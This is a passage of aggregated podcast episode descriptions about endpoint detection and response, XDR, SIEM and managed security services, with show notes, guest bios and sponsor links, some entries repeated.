security awareness sharp. The episode wraps up with a discussion on the recent CrowdStrike update debacle and the challenges of choosing reliable Endpoint Detection and Response (EDR) solutions. Through Chris's expert lens, listeners gain a comprehensive understanding of the current issues and best practices in cybersecurity, making this episode a must-listen for anyone invested in protecting their digital assets.Support the showAffiliate Links:NordVPN: https://go.nordvpn.net/aff_c?offer_id=15&aff_id=87753&url_id=902 Follow the Podcast on Social Media!Instagram: https://www.instagram.com/secunfpodcast/Twitter: https://twitter.com/SecUnfPodcastPatreon: https://www.patreon.com/SecurityUnfilteredPodcastYouTube: https://www.youtube.com/@securityunfilteredpodcastTikTok: Not today China! Not today
Enjoying the content? Let us know your feedback!Today, we will look into two essential cybersecurity solutions: File Integrity Monitoring or FIM and Endpoint Detection and Response, commonly known as EDR.Both of these technologies are crucial for protecting systems, but they work in very different ways. We'll be comparing and contrasting their capabilities, benefits, and use cases.Before we get into the main topic, lets review a top trending piece of security news:SANS Institute released a Critical Infrastructure Strategy Guide- https://www.sans.org: SANS Institute released a Critical Infrastructure Strategy Guide- https://en.wikipedia.org: File Integrity Monitoring- https://www.cisco.com: What is an EDR?Be sure to subscribe! If you like the content. Follow me @iayusuf or read my blog at https://yusufonsecurity.comYou will find a list of all previous episodes in there too.
https://youtu.be/jVSMBcT3GnI This week on the podcast, we cover the National Public Data breach that may have leaked every American's social security number. After that, we discuss research from TALOS on how attackers can abuse Microsoft applications on macOS to gain access to your camera and microphone. We end the episode by discussing recent research on how attackers are attempting to evade Endpoint Detection and Response (EDR) tools.
https://youtu.be/wft_hpC-_Wo This week on the podcast, we cover the National Public Data breach that may have leaked every American's social security number. After that, we discuss research from TALOS on how attackers can abuse Microsoft applications on macOS to gain access to your camera and microphone. We end the episode by discussing recent research on how attackers are attempting to evade Endpoint Detection and Response (EDR) tools.
In the world of business cybersecurity, the powerful technology known as “Security Information and Event Management” is sometimes thwarted by the most unexpected actors—the very people setting it up.Security Information and Event Management—or SIEM—is a term used to describe data-collecting products that businesses rely on to make sense of everything going on inside their network, in the hopes of catching and stopping cyberattacks. SIEM systems can log events and information across an entire organization and its networks. When properly set up, SIEMs can collect activity data from work-issued devices, vital servers, and even the software that an organization rolls out to its workforce. The purpose of all this collection is to catch what might easily be missed.For instance, SIEMs can collect information about repeated login attempts occurring at 2:00 am from a set of login credentials that belong to an employee who doesn't typically start their day until 8:00 am. SIEMs can also collect whether the login credentials of an employee with typically low access privileges are being used to attempt to log into security systems far beyond their job scope. SIEMs must also take in the data from an Endpoint Detection and Response (EDR) tool, and they can hoover up nearly anything that a security team wants—from printer logs, to firewall logs, to individual uses of PowerShell.But just because a SIEM can collect something, doesn't necessarily mean that it should.Log activity for an organization of 1,000 employees is tremendous, and the collection of frequent activity could bog down a SIEM with noise, slow down a security team with useless data, and rack up serious expenses for a company.Today, on the Lock and Code podcast with host David Ruiz, we speak with Microsoft cloud solution architect Jess Dodson about how companies and organizations can set up, manage, and maintain their SIEMs, along with what advertising pitfalls to avoid when doing their shopping. Plus, Dodson warns about one of the simplest mistakes in trying to save budget—setting up arbitrary data caps on collection that could leave an organization blind.“A small SMB organization … were trying to save costs, so they went and looked at what they were collecting and they found their biggest ingestion point,” Dodson said. “And what their biggest ingestion point was was their Windows security events, and then they looked further and looked for the event IDs that were costing them the most, and so they got rid of those.”Dodson continued:“Problem was the ones they got rid of were their Log On/Log Off events, which I think most people would agree is kind of important from a security perspective.”Tune in today to listen to the full conversation.You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.For all our cybersecurity coverage, visit Malwarebytes Labs at malwarebytes.com/blog.Show notes and credits:Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)Licensed under Creative Commons: By Attribution 4.0 Licensehttp://creativecommons.org/licenses/by/4.0/Outro Music: “Good...
Securing Small Businesses: Essential Cybersecurity Tools and Strategies In this episode of CISO Tradecraft, host G Mark Hardy discusses cybersecurity challenges specific to small businesses. He provides insights into key tools and strategies needed for effective cybersecurity management in small enterprises, including endpoint management, patch management, EDR tools, secure web gateways, IAM solutions, email security gateways, MDR services, and password managers. Hardy also evaluates these tools against the CIS Critical Security Controls to highlight their significance in safeguarding small business operations. Transcripts: https://docs.google.com/document/d/1Hon3h950myI7A3jzGmj7YIwRXow5W1V5 Chapters 00:00 Introduction to CISO Tradecraft 00:40 Challenges of Cybersecurity in Small Businesses 01:15 Defining Small Business and Security Baselines 01:53 Top Cybersecurity Tools for Small Businesses 02:05 Hardware and Software Essentials 04:35 Patch Management Solutions 05:19 Endpoint Detection and Response (EDR) Tools 06:06 Secure Web Gateways and Website Security 11:21 Identity and Access Management (IAM) 12:57 Email Security Gateways 14:15 Managed Detection and Response (MDR) Solutions 14:54 Recap of Essential Cybersecurity Tools 15:41 Bonus Tool: Password Managers 18:33 Aligning with CIS Controls 24:48 Conclusion and Call to Action
Rick Howard, The CSO, Chief Analyst, and Senior Fellow at N2K Cyber, discusses the current state of “eXtended Detection and Response” (XDR) with CyberWire Hash Table guests Rick Doten, Centene's VP of Security, and Milad Aslaner, Sentinel One's XDR Product Manager. References: Alexandra Aguiar, 2023. Key Trends from the 2023 Hype Cycle for Security Operations [Gartner Hype Cycle Chart]. Noetic Cyber. Daniel Suarez, 2006. Daemon [Book]. Goodreads. Dave Crocker, 2020. Who Invented Email, Email History, How Email Was Invented [Websote]. LivingInternet. Eric Hutchins, Michael Cloppert, Rohan Amin, 2010, Intelligence-Driven Computer Network Defense Informed by Analysis of Adversary Campaigns and Intrusion Kill Chains [Paper] Lockheed Martin Corporation. Jon Ramsey, Mark Ryland, 2022. AWS co-announces release of the Open Cybersecurity Schema Framework (OCSF) project [Press Release]. Amazon Web Services. Nir Zuk, 2018. Palo Alto Networks Ignite USA '18 Keynote [Presentation]. YouTube. Raffael Marty, 2021. A Log Management History Lesson – From syslogd(8) to XDR [Youtube Video]. YouTube. Raffael Marty, 2021. A history lesson on security logging, from syslogd to XDR [Essay]. VentureBeat. Rick Howard, 2020. Daemon [Podcast]. Word Notes. Rick Howard, 2021. XDR: from the Rick the Toolman Series. [Podcast and Essay]. CSO Perspectives, The CyberWire. Rick Howard, 2023. Cybersecurity First Principles: A Reboot of Strategy and Tactics [Book]. Goodreads. Staff, n.d. Open Cybersecurity Schema Framework [Standard]. GitHub. Staff, 2019. What is EDR? Endpoint Detection & Response Defined [Explainer]. CrowdStrike. Staff, 2020. Log Formats – a (Mostly) Complete Guide [Explainer]. Graylog. Stephen Watts, 2023. Common Event Format (CEF): An Introduction [Explainer]. Splunk. Thomas Lintemuth, Peter Firstbrook, Ayelet Heyman, Craig Lawson, Jeremy D'Hoinne, 2023. Market Guide for Extended Detection and Response [Essay]. Gartner. Learn more about your ad choices. Visit megaphone.fm/adchoices
Jérôme Segura, Senior Director of Threat Intelligence at Malwarebytes, is discussing their work on "Threat actors ride the hype for newly released Arc browser." The Arc browser, newly released for Windows, has quickly garnered positive reviews but has also attracted cybercriminals who are using deceptive Google search ads to distribute malware disguised as the browser. These malicious campaigns exploit the hype around Arc, using techniques like embedding malware in image files and utilizing the MEGA cloud platform for command and control, highlighting the need for caution with sponsored search results and the effectiveness of Endpoint Detection and Response (EDR) systems. The research can be found here: Threat actors ride the hype for newly released Arc browser Learn more about your ad choices. Visit megaphone.fm/adchoices
Jérôme Segura, Senior Director of Threat Intelligence at Malwarebytes, is discussing their work on "Threat actors ride the hype for newly released Arc browser." The Arc browser, newly released for Windows, has quickly garnered positive reviews but has also attracted cybercriminals who are using deceptive Google search ads to distribute malware disguised as the browser. These malicious campaigns exploit the hype around Arc, using techniques like embedding malware in image files and utilizing the MEGA cloud platform for command and control, highlighting the need for caution with sponsored search results and the effectiveness of Endpoint Detection and Response (EDR) systems. The research can be found here: Threat actors ride the hype for newly released Arc browser Learn more about your ad choices. Visit megaphone.fm/adchoices
Host Karl Palachuk interviews Wes Hutcherson and Stuart Ashenbrenner from Huntress on the challenges and (and victories) of securing macOS endpoints. As you know, MacOS represents a growing percentage of the business device operating system market, outperforming both Linux and ChromeOS. Since this is going to be a growing portion of the endpoints you support, it's good to know how you're doing to do that. And with so many "home" and personal devices now being used for company purposes, quick response is important as well. The panel addresses the challenges of the MacOS users - including their persistent reluctance to believe that their devices need protection at all! There is a false sense of security around MacOS, driven by old-school understandings of Mac security and the realities of well-funded adversaries on the dark web. MacOS malware now accounts for 6.2% of all endpoint OS malware. Half of all MacOS users have been affected by malware, hacking, or scams. You can expect that to grow as well. ----- Thanks to Huntress for sponsoring the SMB Community Podcast. Partners can learn more at https://www.huntress.com/karl Wes Hutcherson is the Director of Product Marketing for Huntress where he oversees market intelligence and go-to-market strategies. His multi-faceted technology and cyber security experience spans over a decade with market leaders such as Bishop Fox, eSentire, Hewlett-Packard, and Dell SecureWorks, covering Managed Detection and Response, Governance, Risk, and Compliance, Continuous Threat Exposure Management, Offensive Security, and other topics. Stuart Ashenbrenner works at Huntress as a Staff macOS Researcher, focusing on macOS security and development. He has spoken at various conferences about macOS security, including Objective by the Sea. He is co-author and core developer on the open source, macOS incident response tool called Aftermath. He has perviously worked as a macOS detections engineer and a software engineer. :-) — Our upcoming events and more: Register for James's class at ITSPU! 5W22 – MSP Professional Sales is live. Enroll today: https://www.itspu.com/all-classes/classes/msp-professional-sales-program/ MASTERMIND LIVE – Tampa, FL – June 27-28th http://bit.ly/kernanmastermind Use “EARLYBIRD” as the coupon code to save $200! Check out Amy's weekly newsletter! Sign up now: https://mailchi.mp/thirdtier/small-business-tech-news Kernan Consulting “Weekly Tips”! Sign up now: https://kernanconsulting.com/ Our Social Links: https://www.linkedin.com/in/james-kernan-varcoach/ https://www.facebook.com/james.kernan https://www.facebook.com/karlpalachuk/ https://www.linkedin.com/in/karlpalachuk/ https://www.linkedin.com/in/amybabinchak/ https://www.facebook.com/amy.babinchak/ https://thirdtier.net https://www.youtube.com/@ThirdTierIT --- Sponsor Memo: Huntress Today's SMB Community Podcast is brought to you by Huntress Managed Security. Cybersecurity is more than software—it's also the expertise needed to effectively fight against today's evolving threat landscape. Huntress Managed Security is custom-built to provide human expertise and save your clients from cyber threats. Huntress' suite of fully managed cybersecurity solutions is powered by a 24/7, human-led SOC dedicated to around-the-clock monitoring, expert investigation, and rapid response. While you focus on growing your business, we provide first response to hackers. Huntress has the #1 rated EDR for SMBs on G2 and a partner support Satisfaction score average of 99%. To start a trial today, visit https://huntress.com/karl
(5/1/24) - In today's Federal Newscast: The Defense Innovation Unit gets a new deputy director of commercial operations. The GSA's effort to "right size" the inventory of federal office space continues. And CISA makes major progress deploying Endpoint Detection and Response tools on agency systems. Learn more about your ad choices. Visit megaphone.fm/adchoices
(5/1/24) - In today's Federal Newscast: The Defense Innovation Unit gets a new deputy director of commercial operations. The GSA's effort to "right size" the inventory of federal office space continues. And CISA makes major progress deploying Endpoint Detection and Response tools on agency systems. Learn more about your ad choices. Visit podcastchoices.com/adchoicesSee Privacy Policy at https://art19.com/privacy and California Privacy Notice at https://art19.com/privacy#do-not-sell-my-info.
In a world where technology evolves at breakneck speed, so too do the methods by which cybercriminals exploit it for malicious purposes. As we edge closer to the 2024 general election, the digital landscape becomes a minefield of sophisticated cyber threats aimed at voters. To navigate this complex terrain, we've invited Andrew Newman, CTO and co-founder of ReasonLabs, to share his invaluable insights on the cybersecurity challenges looming over this pivotal event. Andrew, a seasoned cybersecurity professional with a wealth of experience and the guiding force behind ReasonLabs—a leading provider of enterprise-grade protection—brings a unique perspective to the table. His insights into emerging trends and digital pitfalls that voters may face are invaluable. Today, he will delve into the sophisticated tactics employed by cyber adversaries, including the use of AI to craft convincing phishing attacks and the creation of deepfakes designed to sow discord and manipulate public perception. The use of generative AI by scammers has significantly lowered the barriers to creating realistic fake content, posing a serious threat to election security. Andrew will break down how these advanced threats work and the implications for voters' privacy and the integrity of electoral processes. He will also stress the crucial role of public education in countering these threats despite the challenges posed by the realistic nature of AI-generated content. ReasonLabs, a pioneer in consumer cybersecurity, is at the forefront of implementing layered protections. These include anti-phishing measures and Endpoint Detection and Response (EDR) systems designed to counter these emerging threats. Through this conversation, Andrew aims to equip listeners with the knowledge and tools they need to protect themselves against the sophisticated scams that are expected to proliferate during the election season. Expect to uncover the nature of the cyber threats targeting voters, from the evolution of phishing attacks to the sinister use of deepfakes. Learn to discern between genuine and malicious communications, the importance of verifying information sources, and the best practices for ensuring digital security in an increasingly vulnerable online environment. As we delve into these critical issues, Andrew will also shed light on the expected increase in election-related scams compared to previous years, fueled by advancements in technology that enable scammers to craft more believable and, thus, more dangerous threats. From robocalls and SMiShing to phishing sites and deceptive donation requests, listeners will understand the scams to watch out for and the measures to avoid becoming a victim. This episode is not just about highlighting problems; it's about forging solutions and strategies to bolster our digital defenses against a significant democratic event. Join us as we explore the intersection of technology, security, and democracy with one of the industry's most seasoned experts. How prepared are we to defend the sanctity of our votes in the digital age? Share your thoughts and join the conversation.
In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel.AhnLab Security Intelligence Center published an article exploring Nood RAT. Nood RAT is a variant of Gh0st RAT that works in Linux.GTPDOOR is the name of Linux-based malware that is intended to be deployed on systems in telco networks adjacent to the GRPS eXchange Network with the novel feature of communicating C2 traffic over GTP-C Control Plane signaling messages.Researchers reporting on Pikabot evasion techniques for Endpoint Detection and Response systems by employing an advanced technique to hide its malicious activities known as “indirect system calls”.Nit 42 at Palo Alto Networks, they are reporting on a new Linux variant of Bifrost that is showcasing an innovative technique to evade detection.President Biden issued an Executive Order to protect Americans' sensitive personal data from exploitation by countries of concern.
Mark Taylor, the CTO and co-founder of Chorus, a 24-year-old traditional MSP with a strong Microsoft focus, provided a wealth of knowledge on this subject. He explained that Chorus has three core streams: traditional managed services, a Microsoft-focused Dynamics practice, and a security web practice that has been operating for about five years. The discussion started with a focus on the evolving threat landscape over the past 18 months. Mark emphasized that security breaches can often be triggered by the simplest mistakes, such as leaving a back door open. MSPs are increasingly targeted by cybercriminals, making security a paramount concern for both MSPs and their clients. Mark highlighted that, historically, businesses viewed security as locking the gates and fortifying their defenses. However, this approach is outdated. Even if you build strong walls, determined attackers will find a way in. Instead, the new perspective is to assume that they will get in eventually and focus on quickly detecting and responding to threats. This resilience-driven mindset is essential for protecting both MSPs and their clients. When it comes to starting the journey into managed security services, Mark stressed the importance of implementing basic security hygiene effectively. Properly implemented Multi-Factor Authentication (MFA) is a key component in reducing risks, with studies showing that 98% of risks can be mitigated through these basic measures. Additionally, Mark highlighted the shift from traditional antivirus solutions to Endpoint Detection and Response (EDR) or Managed XDR (Extended Detection and Response) services, which provide more comprehensive threat detection and response capabilities. Mark clarified that the term MSSP (Managed Security Service Provider) has evolved over time and is now broadly applicable to most MSPs. Even if MSPs are not offering full-blown 24/7 security operations centre (SOC) services, they are still engaging with security discussions and implementing essential security measures. It's a matter of varying degrees of specialization and service offerings. The conversation then turned towards Chorus's journey in building its own Cyber Security Operations Center (CSOC). Mark explained that their decision to invest in a CSOC stemmed from the need to provide enhanced security services to their larger clients. They recognized the need for faster threat detection and containment, which is achievable with a dedicated CSOC. Ian inquired about the different security layers within MSPs, including the help desk, the Network Operations Center (NOC), and the Security Operations Center (SOC). Mark clarified that the SOC primarily focuses on monitoring and responding to security threats, ensuring rapid detection and containment. While some MSPs choose to handle security alerts within their organization, others outsource these functions to specialized providers. They also discussed the differences between Managed Detection and Response (MDR) and Managed Extended Detection and Response (MXDR). MDR initially focuses on protecting endpoints, whereas MXDR extends its scope to cover additional security measures, such as monitoring sign-in logs on domain controllers and analysing email traffic in greater detail. The choice between MDR and MXDR depends on the MSP's and clients' specific needs and risk profiles. The conversation touched on the adoption of Microsoft's security solutions, with Mark highlighting the attractiveness of Microsoft 365 Business Premium, which includes Defender for Endpoint. Many clients already have these licenses and may opt to leverage Microsoft's security offerings, reducing the need for third-party solutions. Finally, they delved into the role of Artificial Intelligence (AI) in shaping the future of cybersecurity. AI is rapidly becoming an integral part of security operations, providing quicker insights and decision-making capabilities. While AI enhances security measures, it is not a replacement for human expertise but rather a tool that supports and enhances the capabilities of security professionals. In conclusion, this episode with Mark Taylor shed light on the evolving landscape of managed security services and the crucial role they play in safeguarding MSPs and their clients. As the threat landscape continues to evolve, it is essential for MSPs to consider adopting managed security services and choose the right security measures to protect their clients effectively. Connect with Mark Taylor on his LinkedIn by clicking HERE Or you can also check out Chorus through their website by clicking HERE Connect with me on LinkedIn and see what I'm up to by clicking HERE To join our amazing Facebook Group of over 300 MSPs where we are helping you Scale Up with Confidence, then click HERE Until next time, look after yourself and I'll catch up with you soon!
In this episode of the Identity at the Center (IDAC) podcast, hosts Jim McDonald and Jeff Steadman have an in-depth discussion about cyber insurance with guest Jason Rebholz, Chief Information Security Officer at Corvus Insurance. Jason also hosts the popular Teach Me Cyber YouTube channel and shares his journey into security content creation. Topics covered around cyber insurance include an overview of what it is, what protections it offers, what type of companies need it, as well as best practices for completing applications. They discuss key security controls that insurance carriers look for, with a focus Multi-Factor Authentication (MFA), Endpoint Detection and Response (EDR), and resilient backups. Jason offers perspective into the evolving role of insurance providers, not just in paying claims, but in coordinating incident response and providing value-added services to policyholders. This includes recommending and connecting customers to vetted vendors, reviewing response costs, and helping plan remediation efforts. Other discussion areas include common mistakes applicants make on cyber insurance questionnaires and how to provide proper context to underwriters. The group also talks through emerging technologies like Privileged Access Management (PAM) and AI that enterprises should be aware of. On the lighter side, Jason shares his passion for indoor rock climbing and how the sport connects to his work in security with skills like problem solving, mental mapping, and dealing with constant change. Connect with Jason: https://www.linkedin.com/in/jrebholz/ Teach Me Cyber on YouTube: https://www.youtube.com/@teachmecyber Weekend Byte Newsletter: weekendbyte.teachmecyber.com Learn more about Corvus Insurance: https://www.corvusinsurance.com/ Identiverse Regional Event - Chicago: https://bit.ly/IDVR23-IDAC Connect with us on LinkedIn: Jim McDonald: https://www.linkedin.com/in/jimmcdonaldpmp/ Jeff Steadman: https://www.linkedin.com/in/jeffsteadman/ Visit the show on the web at idacpodcast.com and follow @IDACPodcast on Twitter.
In our second installment for cybersecuritymonth we will be diving into EDR: Endpoint Detection and Response. As always have fun, and hopefully learn a thing or two in the process. Make sure to follow us so you don't miss the new videos we have coming out and share this video with someone you think would enjoy or learn something from it. Visit Shortarms website: https://www.shortarmsolutions.com/ You can follow us at: Linked In: https://www.linkedin.com/company/shortarmsolutions YouTube: https://www.youtube.com/@shortarmsolutions Twitter: https://twitter.com/ShortArmSAS
In our second installment for cybersecuritymonth we will be diving into EDR: Endpoint Detection and Response. As always have fun, and hopefully learn a thing or two in the process. Make sure to follow us so you don't miss the new videos we have coming out and share this video with someone you think would enjoy or learn something from it. Visit Shortarms website: https://www.shortarmsolutions.com/ You can follow us at: Linked In: https://www.linkedin.com/company/shortarmsolutions YouTube: https://www.youtube.com/@shortarmsolutions Twitter: https://twitter.com/ShortArmSAS
There are a host of cyber activities and initiatives underway in the federal government right now, and what better way to mark Cybersecurity Awareness Month than by having Mitch Herckis, Branch Director for Federal Cybersecurity at the Office of Management and Budget on to detail them all for us. Mitch also has an encyclopedic memory of E.O. and M-memo numbers, which warms our hearts at GovNavigators. ResourcesE.O. 14028: Improving the Nation's Cybersecurity M-22-09: Federal Zero Trust StrategyM-23-22: Delivering a Digital-First Public ExperienceM-22-01: Improving Detection of Cybersecurity Vulnerabilities and Incidents on Federal Government Systems through Endpoint Detection and ResponseM-22-18: Enhancing the Security of the Software Supply Chain through Secure Software Development Practices
Title: Episode 54 - XDR Deep Dive with Matt Robertson and Aaron Woland Hosts Bryan and Tom return with a fascinating exploration of Extended Detection and Response (XDR) in this latest episode of Conf T with your SE. We kick things off with a fundamental question - What is XDR? Our guests, security experts Matt Robertson and Aaron Woland, provide an insightful overview and outline the pressing need for XDR in today's security landscape. The discussion then veers towards understanding the key differences between XDR and SecureX, another well-known security platform. Our hosts dig into the integration of tools like Cisco Threat Response and Orchestration built into SecureX, illuminating how XDR ups the ante by bringing detection into the tool, instead of merely relying on individual security products. Robertson and Woland emphasize the importance of an open XDR platform - one that seamlessly integrates with other vendors outside of Cisco. They detail the significant role of built-in analytics in bolstering security efficacy. Addressing the limitations of Endpoint Detection and Response (EDR), the experts cite the fact that EDR can only reach about 30% of a company's assets and explain why XDR's broader scope is critical in the current context. We then delve into comparisons with Security Information and Event Management (SIEM) systems. Are they the same as XDR? Or, perhaps more pertinently, is a SIEM system enough? Lastly, the conversation steers towards the operational aspects of XDR, specifically how it can confirm, prioritize, and walk through an incident - an essential aspect of any robust cybersecurity framework. Tune in to this gripping episode to deepen your understanding of XDR and why it's vital in today's digital landscape.
In this episode, we take a deep dive into Endpoint Detection and Response (EDR) and explore how it can save your business from potential cyber threats. We discuss the benefits of EDR, implementation best practices, and factors to consider when selecting an EDR solution. Don't miss this crucial episode for businesses looking to enhance their cybersecurity strategy. Previous EDR Podcast: https://rss.com/podcasts/cit-techforbusiness/857284/Have a question or topic suggestion? Email us at info@cit-net.com or head out to www.cit-net.com/podcastNever miss an episode! Sign up for our newsletter: https://www.cit-net.com/podcast/
Kaspersky lidera en las pruebas TOP3 de seguridad cibernética en 2022, demostrando una vez más su desempeño superior en evaluaciones independientes a lo largo del año. Con 69 primeros lugares y 73 posiciones TOP3 en 86 pruebas y revisiones, los productos de Kaspersky superaron a la competencia en métricas clave, incluyendo protección antimalware para el hogar y soluciones corporativas como Endpoint Detection y Response Expert.
Grayshift wants to allow customers to remove limitations such as inadequate computers and the need to use expensive external units. VeraKey has delivered the ability for investigators to share evidence regardless of geographic boundaries. VeraKey is Grayshift's solution for commercial customers who want a GrayKey device, the collection tool used by law enforcement. Unlike GrayKey, VeraKey is a consent-based mobile forensic solution. It performs the same function in performing full file system collection from a device and providing that for forensic analysis. [01:50] Profile of this episode's Guest: Brian Fitch, Senior Product Manager - Grayshift Brian was instrumental in the development and release of VeraKey. He has been the Product Manager for a variety of companies. Twenty-five years ago, he started his cybersecurity career in customer support and transitioned into sales or systems engineering. [08:11] Endpoint Detection and Response(EDR) and Manage Detection and Response(MDR) EDR is what antivirus and anti-malware have morphed into today. It protects endpoints against the latest threats and gives customers information about what is happening at those endpoints. Sometimes something new can get into the system that isn't detected by anti-malware or antivirus. EDR reports against that. MDR ingests the alerts of EDR and sends them through software engineering and artificial intelligence to take out actionable security alerts for customers. [13:31] Brian's journey to Grayshift Brian had heard of the company and the positive outcomes it helped deliver, so he had been interested in joining Grayshift for a while. More and more people he knew and had good working relationships with had joined Grayshift. When a product management position opened, he pursued it and started with Grayshift last summer. [17:38] What is VeraKey? VeraKey is a consent-based mobile forensics solution offering plug-and-play functionality to perform a full-file system collection while offering simultaneous data analysis when coupled with Grayshift's new ArtifactIQ. A significant benefit is the ease with which collections can be shared, even with geographical separations in an investigation. The best feature is the ease of use. Following the workflow, the full file system is extracted. The user can opt to upload to ArtifactIQ and reach their first fact faster while performing analysis. The main difference between VeraKey and GrayKey is that VeraKey is a consent-based device only. It cannot unlock or brute force a phone like GrayKey. The companies using VeraKey have the consent of the device custodian and are usually performing a corporate investigation. [20:24] ArtifactIQ and how it works with VeraKey ArtifactIQ is a cloud based analytics tool. When VeraKey starts collecting data, it gives you the option to send that collected data to ArtifactIQ simultaneously. Once in the cloud, ArtifactIQ pulls the most important data forward and puts it in an easy-to-read format inside the same user interface. Investigators can then review data easily and quickly. [24:59] Research from the private sector Grayshift spoke with many digital forensic examiners in the private sector while conducting research for the creation of VeraKey. Companies were adamant about protecting their employees from outside threats such as litigation of a perceived malpractice event. Commercial customers benefit from having consent for the collection, usually due to the device being a corporate-owned device or having a Bring Your Own Device agreement. [33:40] Prioritizing the roadmap for innovations Prioritization is one of the most fun and frustrating parts of being a product manager. Many organizations follow a framework such as Weighted Shortest Job First (WSJF) or Reach Impact Confidence Effort (RICE) to prioritize what problems to solve first. There's no right or wrong method for prioritization. Organizations need to determine what approach would work best for them. Brian primarily focuses on ensuring the company addresses the right problems first. CONNECT WITH DEBBIE, KARIN, AND GRAYSHIFT Debbie on Twitter Debbie on LinkedIn Karin on Linkedin Check out Grayshift online - https://Grayshift.com Grayshift on Facebook Grayshift on Instagram Grayshift on Twitter Grayshift on LinkedIn Connect with us about the podcast at podcast@grayshift.com
In this episode, we'll be focusing on Endpoint Detection and Response (EDR), a critical technology for detecting and responding to threats that target endpoints such as laptops, desktops, and servers.Our in-house guests will provide an overview of EDR and explain why it's important for businesses of all sizes. They'll define EDR and explore the different components that make up an EDR system, including the differences between EDR and traditional antivirus software.The podcast will also discuss how EDR works and explore the various methods of threat detection, including signature-based, behavior-based, and machine learning-based techniques. The use cases for EDR, including advanced persistent threat (APT) detection, incident response, and forensic analysis will also be highlighted. In addition, we'll explore the benefits of using EDR in various industries such as healthcare, finance, and government.Finally, our experts will provide tips and best practices for implementing and using EDR effectively, including the importance of regular software updates and threat intelligence sharing.If you're concerned about cybersecurity threats to your organization and want to learn everything you need to know about EDR, then tune in to this informative episode of our podcast.
EDR! Oggi risponderemo con un episodio di intensità scalare a tutte le domande riguardo questo fantastico strumento di sicurezza.Questa volta l'episodio sarà fruibile a tutti, indipendentemente dal livello di conoscenza nell'ambito security.Ma si sà... niente è perfetto, quindi in pieno stile Cybersecurity Podcast scopriremo anche come eludere uno dei tanti controlli eseguiti sui live processes!Seguitemi su Spotify, Itunes, Linkedin ed instagram "@nick.soc" per restare aggiornati sulle nuove pubblicazioni!
In this episode of The Power Producers Podcast, David Carothers interviews Chris Steffl, and Daniel Metcalf of CyberFin. Chris and Daniel discuss everything they're doing to make waves in the commercial insurance industry for producers and agencies who want to become better at using cyber to establish relationships and educate their clients on cyber liability. Episode Highlights: Chris explains that he is a second-generation insurance professional who has worked for an insurance wholesale company for 20 years. (3:03) Daniel mentions that he has spent the past 15 years addressing business challenges for technology, and he has assisted in the development of a service on how to ensure that banks and credit unions comply with rules. (3:50) Daniel explains how they have assisted MSPs and commercial insurance companies. (7:22) Daniel explains that spoofed authentication, when a cybercriminal impersonates you or our organization to gain their multi-factor authentication credentials.. (13:21) Daniel discusses Endpoint Detection and Response (EDR) which looks for ransomware code malware code on your computer that may be disguised. (23:28) Daniel explains that cybercriminals are targeting small and medium-sized enterprises because they have realized that they are an easier, more profitable target. (30:23) Chris explains that each industry has different risks, yet they are all comparable across industries. (37:21) Chris explains that for the past six months, they have been working on developing a program that would allow agencies and agents to bring their customers in to be educated about cyber liability. (39:31) David discusses why cyber liability is getting more popular these days. (42:31) Tweetable Quotes: “EDR is Endpoint, Detection and Response…What EDR does is it looks for ransomware code, malware code actively working on your computer because it can be masked as something that's supposed to be there.” - Daniel Metcalf “Multilayer protection is so important and that's the thing we're really trying to get out there on time, because right now, one line of defense can be gotten through, possibly, you've got to have multiple lines of defense to basically stop this.” - Chris Steffl “One thing we've put in place over the last six months here, is really trying to offer a program that as an agency or an agent to be able to bring their customers in so they can become educated.” - Chris Steffl Resources Mentioned: Chris Steffl LinkedIn Daniel Metcalf LinkedIn CyberFin David Carothers Kyle Houck Florida Risk Partners The Extra 2 Minutes
In this episode of The Power Producers Podcast, David Carothers interviews Chris Steffl, and Daniel Metcalf of CyberFin. Chris and Daniel discuss everything they're doing to make waves in the commercial insurance industry for producers and agencies who want to become better at using cyber to establish relationships and educate their clients on cyber liability. Episode Highlights: Chris explains that he is a second-generation insurance professional who has worked for an insurance wholesale company for 20 years. (3:03) Daniel mentions that he has spent the past 15 years addressing business challenges for technology, and he has assisted in the development of a service on how to ensure that banks and credit unions comply with rules. (3:50) Daniel explains how they have assisted MSPs and commercial insurance companies. (7:22) Daniel explains that spoofed authentication, when a cybercriminal impersonates you or our organization to gain their multi-factor authentication credentials.. (13:21) Daniel discusses Endpoint Detection and Response (EDR) which looks for ransomware code malware code on your computer that may be disguised. (23:28) Daniel explains that cybercriminals are targeting small and medium-sized enterprises because they have realized that they are an easier, more profitable target. (30:23) Chris explains that each industry has different risks, yet they are all comparable across industries. (37:21) Chris explains that for the past six months, they have been working on developing a program that would allow agencies and agents to bring their customers in to be educated about cyber liability. (39:31) David discusses why cyber liability is getting more popular these days. (42:31) Tweetable Quotes: “EDR is Endpoint, Detection and Response…What EDR does is it looks for ransomware code, malware code actively working on your computer because it can be masked as something that's supposed to be there.” - Daniel Metcalf “Multilayer protection is so important and that's the thing we're really trying to get out there on time, because right now, one line of defense can be gotten through, possibly, you've got to have multiple lines of defense to basically stop this.” - Chris Steffl “One thing we've put in place over the last six months here, is really trying to offer a program that as an agency or an agent to be able to bring their customers in so they can become educated.” - Chris Steffl Resources Mentioned: Chris Steffl LinkedIn Daniel Metcalf LinkedIn CyberFin David Carothers Kyle Houck Florida Risk Partners The Extra 2 Minutes
Martin talks about the importance of security for the Atomized Network -- providing enterprises with full visibility and control across their entire network infrastructure. He elaborates on the atomized network. He also talks about how we are trying to weave together different cloud networks. He stresses the need to have one place to bring all the individual pieces and technologies together. He talks about writing/building next generation firewalls, appliance based DPI's, intrusion prevention systems. Netography is built on the idea of having visibility and control. "How can security teams adapt to today's changing, widely dispersed Atomized Network? Maintain visibility and control where Endpoint Detection and Response (EDR), and other traditional solutions simply cannot see independently Help organizations obtain context to their data to visualize and analyze their network by application, location, compliance groups or any other scheme" Connect with Martin: https://www.linkedin.com/in/maroesch/ Visit Netography: https://netography.com/ Visit Short Arms website: https://www.shortarmsolutions.com/ You can follow us at: Linked In: https://www.linkedin.com/company/shortarmsolutions YouTube: https://www.youtube.com/@shortarmsolutions Twitter: https://twitter.com/ShortArmSAS
